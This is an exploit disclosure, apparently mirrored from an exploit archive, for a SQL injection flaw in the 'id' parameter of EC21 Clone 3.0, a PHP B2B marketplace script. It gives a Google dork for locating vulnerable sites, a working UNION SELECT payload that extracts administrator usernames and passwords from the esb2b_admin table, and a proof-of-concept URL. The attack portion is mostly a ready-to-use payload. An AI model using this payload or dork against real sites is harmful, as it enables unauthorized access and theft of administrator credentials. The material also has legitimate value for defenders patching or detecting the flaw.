EC21 Clone 3.0 (id) SQL Injection Vulnerability

2010-04-30T00:00:00
ID 1337DAY-ID-12078
Type zdt
Reporter v3n0m
Modified 2010-04-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================
EC21 Clone 3.0 (id) SQL Injection Vulnerability
===============================================

Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : April, 30-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : EC21 Clone
Vendor      : http://www.alibabaclone.com/
Price       : $499 USD
Google Dork : allinurl:offers_buy.php?id=
Overview    :
 
B2B trading Marketplace Script clone of alibaba Marketplace script is a
wonderful solution to launch your own business to business and b2c site.
Script is packed with lot of features to provide a very sound foundation
to your trading portal site.
----------------------------------------------------------------
 
Exploit:
~~~~~~~
 
-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin--
 
 
SQLi p0c:
~~~~~~~
 
http://127.0.0.1/[path]/offers_buy.php?id=[SQLi]
----------------------------------------------------------------



#  0day.today [2018-04-05]  #